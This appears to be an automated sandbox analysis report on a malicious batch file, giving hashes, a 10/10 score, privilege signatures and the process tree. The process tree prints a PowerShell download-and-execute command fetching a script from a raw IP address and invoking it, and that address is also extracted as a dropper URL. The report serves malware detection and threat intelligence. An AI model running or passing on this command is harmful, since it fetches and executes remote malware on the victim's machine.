Analysis
-
max time kernel
109s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
01-04-2020 17:10
Static task
static1
Behavioral task
behavioral1
Sample
mUNetnda.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
mUNetnda.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
mUNetnda.bat
-
Size
190B
-
MD5
8d47ed92c538cfd43a00b6489d8b4af4
-
SHA1
f5b96923c6ba26d2cc1b8d7931c713ced4c9a8b3
-
SHA256
fdb71ddc395ffaf887e8f74472c3d02d098a948b96eb4a022f8ab36d3232a507
-
SHA512
18a320853db978eae913be9170806265455a882d72f2a853d4747623a6940240824c3ed952457fea512ec6d9ef3f7fd2b2f790dccf904c205594cf2e06eb4586
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/mUNetnda
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3092 3620 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3092 WerFault.exe Token: SeBackupPrivilege 3092 WerFault.exe Token: SeDebugPrivilege 3092 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3092 WerFault.exe 3092 WerFault.exe 3092 WerFault.exe 3092 WerFault.exe 3092 WerFault.exe 3092 WerFault.exe 3092 WerFault.exe 3092 WerFault.exe 3092 WerFault.exe 3092 WerFault.exe 3092 WerFault.exe 3092 WerFault.exe 3092 WerFault.exe 3092 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\mUNetnda.bat"1⤵PID:1992
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/mUNetnda');Invoke-LISWYRT;Start-Sleep -s 10000"2⤵PID:3620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3092